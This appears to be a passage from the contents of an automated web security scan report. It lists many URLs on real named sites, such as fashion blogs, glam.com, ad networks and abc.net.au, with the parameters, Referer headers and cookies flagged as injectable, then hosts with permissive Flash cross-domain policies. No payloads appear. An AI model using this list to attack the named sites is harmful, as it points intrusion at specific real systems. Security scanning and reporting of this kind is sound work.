6.276. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 13]

6.277. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 14]

6.278. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 15]

6.279. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 16]

6.280. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 17]

6.281. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 18]

6.282. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 19]

6.283. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 1]

6.284. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 2]

6.285. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 3]

6.286. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 4]

6.287. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 5]

6.288. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 6]

6.289. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 7]

6.290. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 8]

6.291. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [REST URL parameter 9]

6.292. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/ [name of an arbitrarily supplied request parameter]

6.293. http://www.thefashionablebambino.com/favicon.ico [REST URL parameter 1]

6.294. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [REST URL parameter 3]

6.295. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [closed parameter]

6.296. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [logged_in parameter]

6.297. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [name of an arbitrarily supplied request parameter]

6.298. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [referrer parameter]

6.299. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [title parameter]

6.300. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [url parameter]

6.301. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [visit_delta parameter]

6.302. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/ [wpgb_public_action parameter]

6.303. http://www.thefashionablegal.com/04/2011/interview-with-rob-zangardi-and-mariel-haenn/index.php [REST URL parameter 4]

6.304. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [REST URL parameter 3]

6.305. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [closed parameter]

6.306. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [logged_in parameter]

6.307. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [name of an arbitrarily supplied request parameter]

6.308. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [referrer parameter]

6.309. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [title parameter]

6.310. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [url parameter]

6.311. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [visit_delta parameter]

6.312. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/ [wpgb_public_action parameter]

6.313. http://www.thefashionablegal.com/04/2011/spring-fashion-trends/index.php [REST URL parameter 4]

6.314. http://www.thefashionablegal.com/wp-content/plugins/commentluv/js/commentluv.js [REST URL parameter 1]

6.315. http://www.thefashionablegal.com/wp-content/plugins/commentluv/js/commentluv.js [REST URL parameter 2]

6.316. http://www.thefashionablegal.com/wp-content/plugins/commentluv/js/commentluv.js [REST URL parameter 3]

6.317. http://www.thefashionablegal.com/wp-content/plugins/commentluv/js/commentluv.js [REST URL parameter 4]

6.318. http://www.thefashionablegal.com/wp-content/plugins/commentluv/js/commentluv.js [REST URL parameter 5]

6.319. http://www.thefashionablegal.com/wp-content/plugins/gregs-threaded-comment-numbering/gtcn-css.css [REST URL parameter 1]

6.320. http://www.thefashionablegal.com/wp-content/plugins/gregs-threaded-comment-numbering/gtcn-css.css [REST URL parameter 2]

6.321. http://www.thefashionablegal.com/wp-content/plugins/gregs-threaded-comment-numbering/gtcn-css.css [REST URL parameter 3]

6.322. http://www.thefashionablegal.com/wp-content/plugins/gregs-threaded-comment-numbering/gtcn-css.css [REST URL parameter 4]

6.323. http://www.thefashionablegal.com/wp-content/plugins/lightbox-2/lightbox.js [REST URL parameter 1]

6.324. http://www.thefashionablegal.com/wp-content/plugins/lightbox-2/lightbox.js [REST URL parameter 2]

6.325. http://www.thefashionablegal.com/wp-content/plugins/lightbox-2/lightbox.js [REST URL parameter 3]

6.326. http://www.thefashionablegal.com/wp-content/plugins/lightbox-2/lightbox.js [REST URL parameter 4]

6.327. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_play.php [REST URL parameter 1]

6.328. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_play.php [REST URL parameter 2]

6.329. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_play.php [REST URL parameter 3]

6.330. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_play.php [REST URL parameter 4]

6.331. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_play.php [REST URL parameter 5]

6.332. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php [REST URL parameter 1]

6.333. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php [REST URL parameter 2]

6.334. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php [REST URL parameter 3]

6.335. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php [REST URL parameter 4]

6.336. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/securimage_show.php [REST URL parameter 5]

6.337. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 1]

6.338. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 2]

6.339. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 3]

6.340. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 4]

6.341. http://www.thefashionablegal.com/wp-content/plugins/si-captcha-for-wordpress/captcha-secureimage/si_captcha.js [REST URL parameter 5]

6.342. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/css/style.css [REST URL parameter 1]

6.343. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/css/style.css [REST URL parameter 2]

6.344. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/css/style.css [REST URL parameter 3]

6.345. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/css/style.css [REST URL parameter 4]

6.346. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/css/style.css [REST URL parameter 5]

6.347. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 1]

6.348. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 2]

6.349. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 3]

6.350. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 4]

6.351. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/functions.js [REST URL parameter 5]

6.352. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 1]

6.353. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 2]

6.354. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 3]

6.355. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 4]

6.356. http://www.thefashionablegal.com/wp-content/plugins/wp-greet-box/js/js-mode.js [REST URL parameter 5]

6.357. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-css.css [REST URL parameter 1]

6.358. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-css.css [REST URL parameter 2]

6.359. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-css.css [REST URL parameter 3]

6.360. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-css.css [REST URL parameter 4]

6.361. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 1]

6.362. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 2]

6.363. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 3]

6.364. http://www.thefashionablegal.com/wp-content/plugins/wp-postratings/postratings-js.js [REST URL parameter 4]

6.365. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/images/favicon.ico [REST URL parameter 5]

6.366. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [REST URL parameter 1]

6.367. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [REST URL parameter 2]

6.368. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [REST URL parameter 3]

6.369. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [REST URL parameter 4]

6.370. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [adv parameter]

6.371. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php [name of an arbitrarily supplied request parameter]

6.372. http://www.thefashionablegal.com/wp-includes/js/comment-reply.js [REST URL parameter 1]

6.373. http://www.thefashionablegal.com/wp-includes/js/comment-reply.js [REST URL parameter 2]

6.374. http://www.thefashionablegal.com/wp-includes/js/comment-reply.js [REST URL parameter 3]

6.375. http://www.thefashionablegal.com/wp-includes/js/hoverIntent.js [REST URL parameter 1]

6.376. http://www.thefashionablegal.com/wp-includes/js/hoverIntent.js [REST URL parameter 2]

6.377. http://www.thefashionablegal.com/wp-includes/js/hoverIntent.js [REST URL parameter 3]

6.378. http://www.thefashionablegal.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

6.379. http://www.thefashionablegal.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

6.380. http://www.thefashionablegal.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

6.381. http://www.thefashionablegal.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

6.382. http://www.thefashionablegal.com/wp-includes/js/l10n.js [REST URL parameter 1]

6.383. http://www.thefashionablegal.com/wp-includes/js/l10n.js [REST URL parameter 2]

6.384. http://www.thefashionablegal.com/wp-includes/js/l10n.js [REST URL parameter 3]

6.385. http://www.thefashionablegal.com/wp-includes/js/prototype.js [REST URL parameter 1]

6.386. http://www.thefashionablegal.com/wp-includes/js/prototype.js [REST URL parameter 2]

6.387. http://www.thefashionablegal.com/wp-includes/js/prototype.js [REST URL parameter 3]

6.388. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/effects.js [REST URL parameter 1]

6.389. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/effects.js [REST URL parameter 2]

6.390. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/effects.js [REST URL parameter 3]

6.391. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/effects.js [REST URL parameter 4]

6.392. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/wp-scriptaculous.js [REST URL parameter 1]

6.393. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/wp-scriptaculous.js [REST URL parameter 2]

6.394. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/wp-scriptaculous.js [REST URL parameter 3]

6.395. http://www.thefashionablegal.com/wp-includes/js/scriptaculous/wp-scriptaculous.js [REST URL parameter 4]

6.396. http://www.thefashionablegal.com/wp-login.php [REST URL parameter 1]

6.397. http://www.thefashionablegal.com/xmlrpc.php [REST URL parameter 1]

6.398. http://www.thefashionablehousewife.com/favicon.ico [REST URL parameter 1]

6.399. http://www.thefashionablehousewife.com/wp-login.php [REST URL parameter 1]

6.400. http://www.thefashionableplate.com/favicon.ico [REST URL parameter 1]

6.401. http://www.topcareerschools.com/s/279-390/12823153/ [REST URL parameter 2]

6.402. http://www.topcareerschools.com/s/279-390/12823153/ [REST URL parameter 2]

6.403. http://www.webmgr8.com/index.cfm [name of an arbitrarily supplied request parameter]

6.404. http://www.wildflowerlinens.com/products/table-linen [REST URL parameter 1]

6.405. http://www.wildflowerlinens.com/products/table-linen [name of an arbitrarily supplied request parameter]

6.406. http://www.wiseshop.com/contact.html [name of an arbitrarily supplied request parameter]

6.407. http://www.wiseshop.com/shop.php [name of an arbitrarily supplied request parameter]

6.408. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

6.409. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

6.410. http://www25.glam.com/appdir/getscript.jsp [view parameter]

6.411. http://www2b.abc.net.au/tmb/Client/Board.aspx [REST URL parameter 3]

6.412. http://www2b.abc.net.au/tmb/Client/MessageBoardList.aspx [REST URL parameter 3]

6.413. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

6.414. http://www35.glam.com/gad/glamadapt_jsrv.act [;sz parameter]

6.415. http://www35.glam.com/gad/glamadapt_jsrv.act [;sz parameter]

6.416. http://www35.glam.com/gad/glamadapt_jsrv.act [affiliateId parameter]

6.417. http://www35.glam.com/gad/glamadapt_jsrv.act [affiliateId parameter]

6.418. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

6.419. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

6.420. http://www35.glam.com/gad/glamadapt_jsrv.act [mName parameter]

6.421. http://www35.glam.com/gad/glamadapt_jsrv.act [mName parameter]

6.422. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

6.423. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22 [Referer HTTP header]

6.424. http://ad.doubleclick.net.76705.9611.302br.net/jss/adj/N1243.Glam.com/B5234896.7 [Referer HTTP header]

6.425. http://adserving.cpxinteractive.com/st [Referer HTTP header]

6.426. http://ib.adnxs.com/ttj [Referer HTTP header]

6.427. https://support.logrhythm.com/ics/support/default.asp [Referer HTTP header]

6.428. http://www.topstockanalysts.com/land/tsa/top-12-dssnow.asp [Referer HTTP header]

6.429. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

6.430. http://a.collective-media.net/cmadj/6a.orbitcast/tech.general.ros/other [cli cookie]

6.431. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

6.432. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

6.433. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

6.434. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

6.435. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

6.436. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

6.437. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

6.438. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

6.439. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

6.440. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

6.441. http://feeds.mycareer.com.au/crossdomain.xml [REST URL parameter 1]

6.442. http://feeds.mycareer.com.au/crossdomain.xml [name of an arbitrarily supplied request parameter]

6.443. http://feeds.mycareer.com.au/jobresults [REST URL parameter 1]

6.444. http://ib.adnxs.com/acb [acb98596 cookie]

6.445. http://k.collective-media.net/cmadj/cm.guardian/ [cli cookie]

6.446. http://k.collective-media.net/cmadj/cm.guardian/ [cli cookie]

6.447. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]

6.448. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js [ruid cookie]

6.449. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js [ruid cookie]

6.450. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html [ruid cookie]

6.451. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html [ruid cookie]

6.452. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html [ruid cookie]

6.453. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

6.454. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]

6.455. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]

6.456. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]

6.457. http://optimized-by.rubiconproject.com/a/7968/13027/24102-15.js [ruid cookie]

6.458. http://optimized-by.rubiconproject.com/a/7968/13027/24103-2.js [ruid cookie]

6.459. http://seg.sharethis.com/getSegment.php [__stid cookie]

6.460. http://tag.admeld.com/ad/json/100/glammedia/300x250/356541251 [meld_sess cookie]

6.461. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251 [meld_sess cookie]

6.462. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

6.463. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

6.464. http://www.businessspectator.com.au/bs.nsf/Article/Labor-NBN-carbon-tax-broadband-Julia-Gillard-Tony--pd20110502-GFSXJ [BSpreRegistration cookie]

6.465. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

6.466. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [qcsegs cookie]

6.467. http://www2.idexpertscorp.com/blog [exp_super_search_history cookie]

6.468. http://www2.idexpertscorp.com/blog/ [exp_super_search_history cookie]

6.469. http://www2.idexpertscorp.com/blog/single/are-we-getting-any-smarter/ [exp_super_search_history cookie]

6.470. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification [exp_super_search_history cookie]

6.471. http://www2.idexpertscorp.com/blog/tags/tag/breach+notification/ [exp_super_search_history cookie]

6.472. http://www2.idexpertscorp.com/breach-tools [exp_super_search_history cookie]

6.473. http://www2.idexpertscorp.com/breach-tools/breach-healthcheck/ [exp_super_search_history cookie]

6.474. http://www2.idexpertscorp.com/breach-tools/radar-for-phi-1/ [exp_super_search_history cookie]

6.475. http://www2.idexpertscorp.com/contact [exp_super_search_history cookie]

6.476. http://www2.idexpertscorp.com/contact/ [exp_super_search_history cookie]

6.477. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_cookie_sid cookie]

6.478. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]

7. Flash cross-domain policy

7.1. http://0.gravatar.com/crossdomain.xml

7.2. http://1.gravatar.com/crossdomain.xml

7.3. http://a.dlqm.net/crossdomain.xml

7.4. http://ad-apac.doubleclick.net/crossdomain.xml

7.5. http://ad.amgdgt.com/crossdomain.xml

7.6. http://ad.au.doubleclick.net/crossdomain.xml

7.7. http://ad.doubleclick.net/crossdomain.xml

7.8. http://ad.doubleclick.net.76705.9611.302br.net/crossdomain.xml

7.9. http://ads.pointroll.com/crossdomain.xml

7.10. http://ads.shopstyle.com/crossdomain.xml

7.11. http://ads.specificmedia.com/crossdomain.xml

7.12. http://afe.specificclick.net/crossdomain.xml

7.13. http://ajax.googleapis.com/crossdomain.xml

7.14. http://api.bing.net/crossdomain.xml

7.15. http://api.shopstyle.com/crossdomain.xml

7.16. http://c.brightcove.com/crossdomain.xml

7.17. http://cache.daylife.com/crossdomain.xml

7.18. http://cache.specificmedia.com/crossdomain.xml

7.19. http://cdn.eyewonder.com/crossdomain.xml

7.20. http://cdn.hostessblog.com/crossdomain.xml

7.21. http://cr0.worthathousandwords.com/crossdomain.xml

7.22. http://d3fd89.r.axf8.net/crossdomain.xml

7.23. http://ecn.api.tiles.virtualearth.net/crossdomain.xml

7.24. http://ev.ads.pointroll.com/crossdomain.xml

7.25. http://event.adxpose.com/crossdomain.xml

7.26. http://exch.quantserve.com/crossdomain.xml

7.27. http://feeds.feedburner.com/crossdomain.xml

7.28. http://feeds.glam.com/crossdomain.xml

7.29. http://flash.quantserve.com/crossdomain.xml

7.30. http://fls.doubleclick.net/crossdomain.xml

7.31. http://g.REDACTED.com/crossdomain.xml

7.32. http://glam.ivwbox.de/crossdomain.xml

7.33. http://h0.ortho.tiles.virtualearth.net/crossdomain.xml

7.34. http://h1.ortho.tiles.virtualearth.net/crossdomain.xml

7.35. http://h2.ortho.tiles.virtualearth.net/crossdomain.xml

7.36. http://h3.ortho.tiles.virtualearth.net/crossdomain.xml

7.37. http://iar.worthathousandwords.com/crossdomain.xml

7.38. http://img2.catalog.video.REDACTED.com/crossdomain.xml

7.39. http://leads.demandbase.com/crossdomain.xml

7.40. http://loadus.exelator.com/crossdomain.xml

7.41. http://media.fastclick.net/crossdomain.xml

7.42. http://media.onsugar.com/crossdomain.xml

7.43. http://nmp.newsgator.com/crossdomain.xml

7.44. http://oas.guardian.co.uk/crossdomain.xml

7.45. http://pixel.33across.com/crossdomain.xml

7.46. http://pixel.invitemedia.com/crossdomain.xml

7.47. http://puma.vizu.com/crossdomain.xml

7.48. http://rad.REDACTED.com/crossdomain.xml

7.49. http://rd.apmebf.com/crossdomain.xml

7.50. http://s.ytimg.com/crossdomain.xml

7.51. http://search.twitter.com/crossdomain.xml

7.52. http://secure-au.imrworldwide.com/crossdomain.xml

7.53. http://speed.pointroll.com/crossdomain.xml

7.54. http://static.playtexbramakeover.com.s3.amazonaws.com/crossdomain.xml

7.55. http://whos.amung.us/crossdomain.xml

7.56. http://www.abc.net.au/crossdomain.xml

7.57. http://www.hostessblog.com/crossdomain.xml

7.58. http://www.righthealth.com/crossdomain.xml

7.59. http://www.webmd.com/crossdomain.xml

7.60. http://www13.glam.com/crossdomain.xml

7.61. http://www15.glam.com/crossdomain.xml

7.62. http://www2.glam.com/crossdomain.xml

7.63. http://www24a.glam.com/crossdomain.xml

7.64. http://www25.glam.com/crossdomain.xml

7.65. http://www2b.abc.net.au/crossdomain.xml

7.66. http://www3.tinker.com/crossdomain.xml

7.67. http://www30a2-orig.glam.com/crossdomain.xml

7.68. http://www30a2.glam.com/crossdomain.xml

7.69. http://www35.glam.com/crossdomain.xml

7.70. http://xads.zedo.com/crossdomain.xml

7.71. http://yads.zedo.com/crossdomain.xml

7.72. http://ads.adbrite.com/crossdomain.xml

7.73. http://adx.g.doubleclick.net/crossdomain.xml

